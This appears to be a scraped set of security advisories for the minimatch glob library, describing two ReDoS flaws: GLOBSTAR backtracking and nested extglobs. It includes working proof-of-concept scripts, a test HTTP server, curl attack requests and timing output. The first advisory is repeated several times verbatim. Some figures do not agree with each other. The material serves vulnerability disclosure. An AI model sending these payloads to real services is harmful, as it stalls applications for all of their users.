Terminal 2 -- send the attack request (k=11, ~5s stall) and immediately return to shell:

curl "http://localhost:3000/match?pattern=**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2Fb&path=a%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa" &

Terminal 3 -- while the attack is in-flight, send a benign request:

curl -w "\ntime_total: %{time_total}s\n" "http://localhost:3000/match?pattern=**%2Fy%2Fz&path=x%2Fy%2Fz"

Observed output (Terminal 3):

{"result":true,"ms":"0"}

time_total: 4.132709s

The server reports "ms":"0" -- the legitimate request itself takes zero processing time. The 4+ second time_total is entirely time spent waiting for the event loop to be released by the attack request. Every concurrent user is blocked for the full duration of each attack call. Repeating the benign request while no attack is in-flight confirms the baseline:

{"result":true,"ms":"0"}

time_total: 0.001599s

Impact

Any application where an attacker can influence the glob pattern passed to minimatch() is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature.

๐Ÿšจ minimatch has ReDoS: matchOne() combinatorial backtracking via multiple non-adjacent GLOBSTAR segments

Summary

matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior.

Details

The vulnerable loop is in matchOne() at src/index.ts#L960:

while (fr < fl) {
  ..
  if (this.matchOne(file.slice(fr), pattern.slice(pr), partial)) {
    ..
    return true
  }
  ..
  fr++
}

When a GLOBSTAR is encountered, the function tries to match the remaining pattern against every suffix of the remaining file segments. Each ** multiplies the number of recursive calls by the number of remaining segments. With k non-adjacent globstars and n file segments, the total number of calls is C(n, k).

There is no depth counter, visited-state cache, or budget limit applied to this recursion. The call tree is fully explored before returning false on a non-matching input.

Measured timing with n=30 path segments:

k (globstars) Pattern size Time
7 36 bytes ~154ms
9 46 bytes ~1.2s
11 56 bytes ~5.4s
12 61 bytes ~9.7s
13 66 bytes ~15.9s

PoC

Tested on minimatch@10.2.2, Node.js 20.

Step 1 -- inline script

import { minimatch } from 'minimatch'

// k=9 globstars, n=30 path segments
// pattern: 46 bytes, default options
const pattern = '**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/b'
const path    = 'a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a'

const start = Date.now()
minimatch(path, pattern)
console.log(Date.now() - start + 'ms') // ~1200ms

To scale the effect, increase k:

// k=11 -> ~5.4s, k=13 -> ~15.9s
const k = 11
const pattern = Array.from({ length: k }, () => '**/a').join('/') + '/b'
const path    = Array(30).fill('a').join('/')
minimatch(path, pattern)

No special options are required. This reproduces with the default minimatch() call.

Step 2 -- HTTP server (event loop starvation proof)

The following server demonstrates the event loop starvation effect. It is a minimal harness, not a claim that this exact deployment pattern is common:

// poc1-server.mjs
import http from 'node:http'
import { URL } from 'node:url'
import { minimatch } from 'minimatch'

const PORT = 3000

const server = http.createServer((req, res) => {
  const url = new URL(req.url, `http://localhost:${PORT}`)
  if (url.pathname !== '/match') { res.writeHead(404); res.end(); return }

  const pattern = url.searchParams.get('pattern') ?? ''
  const path    = url.searchParams.get('path') ?? ''

  const start  = process.hrtime.bigint()
  const result = minimatch(path, pattern)
  const ms     = Number(process.hrtime.bigint() - start) / 1e6

  res.writeHead(200, { 'Content-Type': 'application/json' })
  res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\n')
})

server.listen(PORT)

Terminal 1 -- start the server:

node poc1-server.mjs

Terminal 2 -- send the attack request (k=11, ~5s stall) and immediately return to shell:

curl "http://localhost:3000/match?pattern=**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2Fb&path=a%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa" &

Terminal 3 -- while the attack is in-flight, send a benign request:

curl -w "\ntime_total: %{time_total}s\n" "http://localhost:3000/match?pattern=**%2Fy%2Fz&path=x%2Fy%2Fz"

Observed output (Terminal 3):

{"result":true,"ms":"0"}

time_total: 4.132709s

The server reports "ms":"0" -- the legitimate request itself takes zero processing time. The 4+ second time_total is entirely time spent waiting for the event loop to be released by the attack request. Every concurrent user is blocked for the full duration of each attack call. Repeating the benign request while no attack is in-flight confirms the baseline:

{"result":true,"ms":"0"}

time_total: 0.001599s

Impact

Any application where an attacker can influence the glob pattern passed to minimatch() is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature.

๐Ÿšจ minimatch has ReDoS: matchOne() combinatorial backtracking via multiple non-adjacent GLOBSTAR segments

Summary

matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior.

Details

The vulnerable loop is in matchOne() at src/index.ts#L960:

while (fr < fl) {
  ..
  if (this.matchOne(file.slice(fr), pattern.slice(pr), partial)) {
    ..
    return true
  }
  ..
  fr++
}

When a GLOBSTAR is encountered, the function tries to match the remaining pattern against every suffix of the remaining file segments. Each ** multiplies the number of recursive calls by the number of remaining segments. With k non-adjacent globstars and n file segments, the total number of calls is C(n, k).

There is no depth counter, visited-state cache, or budget limit applied to this recursion. The call tree is fully explored before returning false on a non-matching input.

Measured timing with n=30 path segments:

k (globstars) Pattern size Time
7 36 bytes ~154ms
9 46 bytes ~1.2s
11 56 bytes ~5.4s
12 61 bytes ~9.7s
13 66 bytes ~15.9s

PoC

Tested on minimatch@10.2.2, Node.js 20.

Step 1 -- inline script

import { minimatch } from 'minimatch'

// k=9 globstars, n=30 path segments
// pattern: 46 bytes, default options
const pattern = '**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/b'
const path    = 'a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a'

const start = Date.now()
minimatch(path, pattern)
console.log(Date.now() - start + 'ms') // ~1200ms

To scale the effect, increase k:

// k=11 -> ~5.4s, k=13 -> ~15.9s
const k = 11
const pattern = Array.from({ length: k }, () => '**/a').join('/') + '/b'
const path    = Array(30).fill('a').join('/')
minimatch(path, pattern)

No special options are required. This reproduces with the default minimatch() call.

Step 2 -- HTTP server (event loop starvation proof)

The following server demonstrates the event loop starvation effect. It is a minimal harness, not a claim that this exact deployment pattern is common:

// poc1-server.mjs
import http from 'node:http'
import { URL } from 'node:url'
import { minimatch } from 'minimatch'

const PORT = 3000

const server = http.createServer((req, res) => {
  const url = new URL(req.url, `http://localhost:${PORT}`)
  if (url.pathname !== '/match') { res.writeHead(404); res.end(); return }

  const pattern = url.searchParams.get('pattern') ?? ''
  const path    = url.searchParams.get('path') ?? ''

  const start  = process.hrtime.bigint()
  const result = minimatch(path, pattern)
  const ms     = Number(process.hrtime.bigint() - start) / 1e6

  res.writeHead(200, { 'Content-Type': 'application/json' })
  res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\n')
})

server.listen(PORT)

Terminal 1 -- start the server:

node poc1-server.mjs

Terminal 2 -- send the attack request (k=11, ~5s stall) and immediately return to shell:

curl "http://localhost:3000/match?pattern=**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2Fb&path=a%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa" &

Terminal 3 -- while the attack is in-flight, send a benign request:

curl -w "\ntime_total: %{time_total}s\n" "http://localhost:3000/match?pattern=**%2Fy%2Fz&path=x%2Fy%2Fz"

Observed output (Terminal 3):

{"result":true,"ms":"0"}

time_total: 4.132709s

The server reports "ms":"0" -- the legitimate request itself takes zero processing time. The 4+ second time_total is entirely time spent waiting for the event loop to be released by the attack request. Every concurrent user is blocked for the full duration of each attack call. Repeating the benign request while no attack is in-flight confirms the baseline:

{"result":true,"ms":"0"}

time_total: 0.001599s

Impact

Any application where an attacker can influence the glob pattern passed to minimatch() is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature.

๐Ÿšจ minimatch has ReDoS: matchOne() combinatorial backtracking via multiple non-adjacent GLOBSTAR segments

Summary

matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior.

Details

The vulnerable loop is in matchOne() at src/index.ts#L960:

while (fr < fl) {
  ..
  if (this.matchOne(file.slice(fr), pattern.slice(pr), partial)) {
    ..
    return true
  }
  ..
  fr++
}

When a GLOBSTAR is encountered, the function tries to match the remaining pattern against every suffix of the remaining file segments. Each ** multiplies the number of recursive calls by the number of remaining segments. With k non-adjacent globstars and n file segments, the total number of calls is C(n, k).

There is no depth counter, visited-state cache, or budget limit applied to this recursion. The call tree is fully explored before returning false on a non-matching input.

Measured timing with n=30 path segments:

k (globstars) Pattern size Time
7 36 bytes ~154ms
9 46 bytes ~1.2s
11 56 bytes ~5.4s
12 61 bytes ~9.7s
13 66 bytes ~15.9s

PoC

Tested on minimatch@10.2.2, Node.js 20.

Step 1 -- inline script

import { minimatch } from 'minimatch'

// k=9 globstars, n=30 path segments
// pattern: 46 bytes, default options
const pattern = '**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/b'
const path    = 'a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a'

const start = Date.now()
minimatch(path, pattern)
console.log(Date.now() - start + 'ms') // ~1200ms

To scale the effect, increase k:

// k=11 -> ~5.4s, k=13 -> ~15.9s
const k = 11
const pattern = Array.from({ length: k }, () => '**/a').join('/') + '/b'
const path    = Array(30).fill('a').join('/')
minimatch(path, pattern)

No special options are required. This reproduces with the default minimatch() call.

Step 2 -- HTTP server (event loop starvation proof)

The following server demonstrates the event loop starvation effect. It is a minimal harness, not a claim that this exact deployment pattern is common:

// poc1-server.mjs
import http from 'node:http'
import { URL } from 'node:url'
import { minimatch } from 'minimatch'

const PORT = 3000

const server = http.createServer((req, res) => {
  const url = new URL(req.url, `http://localhost:${PORT}`)
  if (url.pathname !== '/match') { res.writeHead(404); res.end(); return }

  const pattern = url.searchParams.get('pattern') ?? ''
  const path    = url.searchParams.get('path') ?? ''

  const start  = process.hrtime.bigint()
  const result = minimatch(path, pattern)
  const ms     = Number(process.hrtime.bigint() - start) / 1e6

  res.writeHead(200, { 'Content-Type': 'application/json' })
  res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\n')
})

server.listen(PORT)

Terminal 1 -- start the server:

node poc1-server.mjs

Terminal 2 -- send the attack request (k=11, ~5s stall) and immediately return to shell:

curl "http://localhost:3000/match?pattern=**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2Fb&path=a%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa" &

Terminal 3 -- while the attack is in-flight, send a benign request:

curl -w "\ntime_total: %{time_total}s\n" "http://localhost:3000/match?pattern=**%2Fy%2Fz&path=x%2Fy%2Fz"

Observed output (Terminal 3):

{"result":true,"ms":"0"}

time_total: 4.132709s

The server reports "ms":"0" -- the legitimate request itself takes zero processing time. The 4+ second time_total is entirely time spent waiting for the event loop to be released by the attack request. Every concurrent user is blocked for the full duration of each attack call. Repeating the benign request while no attack is in-flight confirms the baseline:

{"result":true,"ms":"0"}

time_total: 0.001599s

Impact

Any application where an attacker can influence the glob pattern passed to minimatch() is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature.

๐Ÿšจ minimatch has ReDoS: matchOne() combinatorial backtracking via multiple non-adjacent GLOBSTAR segments

Summary

matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior.

Details

The vulnerable loop is in matchOne() at src/index.ts#L960:

while (fr < fl) {
  ..
  if (this.matchOne(file.slice(fr), pattern.slice(pr), partial)) {
    ..
    return true
  }
  ..
  fr++
}

When a GLOBSTAR is encountered, the function tries to match the remaining pattern against every suffix of the remaining file segments. Each ** multiplies the number of recursive calls by the number of remaining segments. With k non-adjacent globstars and n file segments, the total number of calls is C(n, k).

There is no depth counter, visited-state cache, or budget limit applied to this recursion. The call tree is fully explored before returning false on a non-matching input.

Measured timing with n=30 path segments:

k (globstars) Pattern size Time
7 36 bytes ~154ms
9 46 bytes ~1.2s
11 56 bytes ~5.4s
12 61 bytes ~9.7s
13 66 bytes ~15.9s

PoC

Tested on minimatch@10.2.2, Node.js 20.

Step 1 -- inline script

import { minimatch } from 'minimatch'

// k=9 globstars, n=30 path segments
// pattern: 46 bytes, default options
const pattern = '**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/b'
const path    = 'a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a'

const start = Date.now()
minimatch(path, pattern)
console.log(Date.now() - start + 'ms') // ~1200ms

To scale the effect, increase k:

// k=11 -> ~5.4s, k=13 -> ~15.9s
const k = 11
const pattern = Array.from({ length: k }, () => '**/a').join('/') + '/b'
const path    = Array(30).fill('a').join('/')
minimatch(path, pattern)

No special options are required. This reproduces with the default minimatch() call.

Step 2 -- HTTP server (event loop starvation proof)

The following server demonstrates the event loop starvation effect. It is a minimal harness, not a claim that this exact deployment pattern is common:

// poc1-server.mjs
import http from 'node:http'
import { URL } from 'node:url'
import { minimatch } from 'minimatch'

const PORT = 3000

const server = http.createServer((req, res) => {
  const url = new URL(req.url, `http://localhost:${PORT}`)
  if (url.pathname !== '/match') { res.writeHead(404); res.end(); return }

  const pattern = url.searchParams.get('pattern') ?? ''
  const path    = url.searchParams.get('path') ?? ''

  const start  = process.hrtime.bigint()
  const result = minimatch(path, pattern)
  const ms     = Number(process.hrtime.bigint() - start) / 1e6

  res.writeHead(200, { 'Content-Type': 'application/json' })
  res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\n')
})

server.listen(PORT)

Terminal 1 -- start the server:

node poc1-server.mjs

Terminal 2 -- send the attack request (k=11, ~5s stall) and immediately return to shell:

curl "http://localhost:3000/match?pattern=**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2Fb&path=a%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa" &

Terminal 3 -- while the attack is in-flight, send a benign request:

curl -w "\ntime_total: %{time_total}s\n" "http://localhost:3000/match?pattern=**%2Fy%2Fz&path=x%2Fy%2Fz"

Observed output (Terminal 3):

{"result":true,"ms":"0"}

time_total: 4.132709s

The server reports "ms":"0" -- the legitimate request itself takes zero processing time. The 4+ second time_total is entirely time spent waiting for the event loop to be released by the attack request. Every concurrent user is blocked for the full duration of each attack call. Repeating the benign request while no attack is in-flight confirms the baseline:

{"result":true,"ms":"0"}

time_total: 0.001599s

Impact

Any application where an attacker can influence the glob pattern passed to minimatch() is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature.

๐Ÿšจ minimatch has ReDoS: matchOne() combinatorial backtracking via multiple non-adjacent GLOBSTAR segments

Summary

matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior.

Details

The vulnerable loop is in matchOne() at src/index.ts#L960:

while (fr < fl) {
  ..
  if (this.matchOne(file.slice(fr), pattern.slice(pr), partial)) {
    ..
    return true
  }
  ..
  fr++
}

When a GLOBSTAR is encountered, the function tries to match the remaining pattern against every suffix of the remaining file segments. Each ** multiplies the number of recursive calls by the number of remaining segments. With k non-adjacent globstars and n file segments, the total number of calls is C(n, k).

There is no depth counter, visited-state cache, or budget limit applied to this recursion. The call tree is fully explored before returning false on a non-matching input.

Measured timing with n=30 path segments:

k (globstars) Pattern size Time
7 36 bytes ~154ms
9 46 bytes ~1.2s
11 56 bytes ~5.4s
12 61 bytes ~9.7s
13 66 bytes ~15.9s

PoC

Tested on minimatch@10.2.2, Node.js 20.

Step 1 -- inline script

import { minimatch } from 'minimatch'

// k=9 globstars, n=30 path segments
// pattern: 46 bytes, default options
const pattern = '**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/b'
const path    = 'a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a'

const start = Date.now()
minimatch(path, pattern)
console.log(Date.now() - start + 'ms') // ~1200ms

To scale the effect, increase k:

// k=11 -> ~5.4s, k=13 -> ~15.9s
const k = 11
const pattern = Array.from({ length: k }, () => '**/a').join('/') + '/b'
const path    = Array(30).fill('a').join('/')
minimatch(path, pattern)

No special options are required. This reproduces with the default minimatch() call.

Step 2 -- HTTP server (event loop starvation proof)

The following server demonstrates the event loop starvation effect. It is a minimal harness, not a claim that this exact deployment pattern is common:

// poc1-server.mjs
import http from 'node:http'
import { URL } from 'node:url'
import { minimatch } from 'minimatch'

const PORT = 3000

const server = http.createServer((req, res) => {
  const url = new URL(req.url, `http://localhost:${PORT}`)
  if (url.pathname !== '/match') { res.writeHead(404); res.end(); return }

  const pattern = url.searchParams.get('pattern') ?? ''
  const path    = url.searchParams.get('path') ?? ''

  const start  = process.hrtime.bigint()
  const result = minimatch(path, pattern)
  const ms     = Number(process.hrtime.bigint() - start) / 1e6

  res.writeHead(200, { 'Content-Type': 'application/json' })
  res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\n')
})

server.listen(PORT)

Terminal 1 -- start the server:

node poc1-server.mjs

Terminal 2 -- send the attack request (k=11, ~5s stall) and immediately return to shell:

curl "http://localhost:3000/match?pattern=**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2Fb&path=a%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa" &

Terminal 3 -- while the attack is in-flight, send a benign request:

curl -w "\ntime_total: %{time_total}s\n" "http://localhost:3000/match?pattern=**%2Fy%2Fz&path=x%2Fy%2Fz"

Observed output (Terminal 3):

{"result":true,"ms":"0"}

time_total: 4.132709s

The server reports "ms":"0" -- the legitimate request itself takes zero processing time. The 4+ second time_total is entirely time spent waiting for the event loop to be released by the attack request. Every concurrent user is blocked for the full duration of each attack call. Repeating the benign request while no attack is in-flight confirms the baseline:

{"result":true,"ms":"0"}

time_total: 0.001599s

Impact

Any application where an attacker can influence the glob pattern passed to minimatch() is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature.

๐Ÿšจ minimatch ReDoS: nested *() extglobs generate catastrophically backtracking regular expressions

Summary

Nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally.

Details

The root cause is in AST.toRegExpSource() at src/ast.ts#L598. For the * extglob type, the close token emitted is )* or )?, wrapping the recursive body in (?:...)*. When extglobs are nested, each level adds another * quantifier around the previous group:

: this.type === '*' && bodyDotAllowed ? `)?`
: `)${this.type}`

This produces the following regexps:

Pattern Generated regex
*(a|b) /^(?:a|b)*$/
*(*(a|b)) /^(?:(?:a|b)*)*$/
*(*(*(a|b))) /^(?:(?:(?:a|b)*)*)*$/
*(*(*(*(a|b)))) /^(?:(?:(?:(?:a|b)*)*)*)*$/

These are textbook nested-quantifier patterns. Against an input of repeated a characters followed by a non-matching character z, V8's backtracking engine explores an exponential number of paths before returning false.

The generated regex is stored on this.set and evaluated inside matchOne() at src/index.ts#L1010 via p.test(f). It is reached through the standard minimatch() call with no configuration.

Measured times via minimatch():

Pattern Input Time
*(*(a|b)) a x30 + z ~68,000ms
*(*(*(a|b))) a x20 + z ~124,000ms
*(*(*(*(a|b)))) a x25 + z ~116,000ms
*(a|a) a x25 + z ~2,000ms

Depth inflection at fixed input a x16 + z:

Depth Pattern Time
1 *(a|b) 0ms
2 *(*(a|b)) 4ms
3 *(*(*(a|b))) 270ms
4 *(*(*(*(a|b)))) 115,000ms

Going from depth 2 to depth 3 with a 20-character input jumps from 66ms to 123,544ms -- a 1,867x increase from a single added nesting level.

PoC

Tested on minimatch@10.2.2, Node.js 20.

Step 1 -- verify the generated regexps and timing (standalone script)

Save as poc4-validate.mjs and run with node poc4-validate.mjs:

import { minimatch, Minimatch } from 'minimatch'

function timed(fn) {
  const s = process.hrtime.bigint()
  let result, error
  try { result = fn() } catch(e) { error = e }
  const ms = Number(process.hrtime.bigint() - s) / 1e6
  return { ms, result, error }
}

// Verify generated regexps
for (let depth = 1; depth <= 4; depth++) {
  let pat = 'a|b'
  for (let i = 0; i < depth; i++) pat = `*(${pat})`
  const re = new Minimatch(pat, {}).set?.[0]?.[0]?.toString()
  console.log(`depth=${depth} "${pat}" -> ${re}`)
}
// depth=1 "*(a|b)"          -> /^(?:a|b)*$/
// depth=2 "*(*(a|b))"       -> /^(?:(?:a|b)*)*$/
// depth=3 "*(*(*(a|b)))"    -> /^(?:(?:(?:a|b)*)*)*$/
// depth=4 "*(*(*(*(a|b))))" -> /^(?:(?:(?:(?:a|b)*)*)*)*$/

// Safe-length timing (exponential growth confirmation without multi-minute hang)
const cases = [
  ['*(*(*(a|b)))', 15],   // ~270ms
  ['*(*(*(a|b)))', 17],   // ~800ms
  ['*(*(*(a|b)))', 19],   // ~2400ms
  ['*(*(a|b))',    23],   // ~260ms
  ['*(a|b)',      101],   // <5ms (depth=1 control)
]
for (const [pat, n] of cases) {
  const t = timed(() => minimatch('a'.repeat(n) + 'z', pat))
  console.log(`"${pat}" n=${n}: ${t.ms.toFixed(0)}ms result=${t.result}`)
}

// Confirm noext disables the vulnerability
const t_noext = timed(() => minimatch('a'.repeat(18) + 'z', '*(*(*(a|b)))', { noext: true }))
console.log(`noext=true: ${t_noext.ms.toFixed(0)}ms (should be ~0ms)`)

// +() is equally affected
const t_plus = timed(() => minimatch('a'.repeat(17) + 'z', '+(+(+(a|b)))'))
console.log(`"+(+(+(a|b)))" n=18: ${t_plus.ms.toFixed(0)}ms result=${t_plus.result}`)

Observed output:

depth=1 "*(a|b)"          -> /^(?:a|b)*$/
depth=2 "*(*(a|b))"       -> /^(?:(?:a|b)*)*$/
depth=3 "*(*(*(a|b)))"    -> /^(?:(?:(?:a|b)*)*)*$/
depth=4 "*(*(*(*(a|b))))" -> /^(?:(?:(?:(?:a|b)*)*)*)*$/
"*(*(*(a|b)))" n=15: 269ms result=false
"*(*(*(a|b)))" n=17: 268ms result=false
"*(*(*(a|b)))" n=19: 2408ms result=false
"*(*(a|b))"    n=23: 257ms result=false
"*(a|b)"       n=101: 0ms result=false
noext=true: 0ms (should be ~0ms)
"+(+(+(a|b)))" n=18: 6300ms result=false

Step 2 -- HTTP server (event loop starvation proof)

Save as poc4-server.mjs:

import http from 'node:http'
import { URL } from 'node:url'
import { minimatch } from 'minimatch'

const PORT = 3001
http.createServer((req, res) => {
  const url     = new URL(req.url, `http://localhost:${PORT}`)
  const pattern = url.searchParams.get('pattern') ?? ''
  const path    = url.searchParams.get('path') ?? ''

  const start  = process.hrtime.bigint()
  const result = minimatch(path, pattern)
  const ms     = Number(process.hrtime.bigint() - start) / 1e6

  console.log(`[${new Date().toISOString()}] ${ms.toFixed(0)}ms pattern="${pattern}" path="${path.slice(0,30)}"`)
  res.writeHead(200, { 'Content-Type': 'application/json' })
  res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\n')
}).listen(PORT, () => console.log(`listening on ${PORT}`))

Terminal 1 -- start the server:

node poc4-server.mjs

Terminal 2 -- fire the attack (depth=3, 19 a's + z) and return immediately:

curl "http://localhost:3001/match?pattern=*%28*%28*%28a%7Cb%29%29%29&path=aaaaaaaaaaaaaaaaaaaz" &

Terminal 3 -- send a benign request while the attack is in-flight:

curl -w "\ntime_total: %{time_total}s\n" "http://localhost:3001/match?pattern=*%28a%7Cb%29&path=aaaz"

Observed output -- Terminal 2 (attack):

{"result":false,"ms":"64149"}

Observed output -- Terminal 3 (benign, concurrent):

{"result":false,"ms":"0"}

time_total: 63.022047s

Terminal 1 (server log):

[2026-02-20T09:41:17.624Z] pattern="*(*(*(a|b)))" path="aaaaaaaaaaaaaaaaaaaz"
[2026-02-20T09:42:21.775Z] done in 64149ms result=false
[2026-02-20T09:42:21.779Z] pattern="*(a|b)" path="aaaz"
[2026-02-20T09:42:21.779Z] done in 0ms result=false

The server reports "ms":"0" for the benign request -- the legitimate request itself requires no CPU time. The entire 63-second time_total is time spent waiting for the event loop to be released. The benign request was only dispatched after the attack completed, confirmed by the server log timestamps.

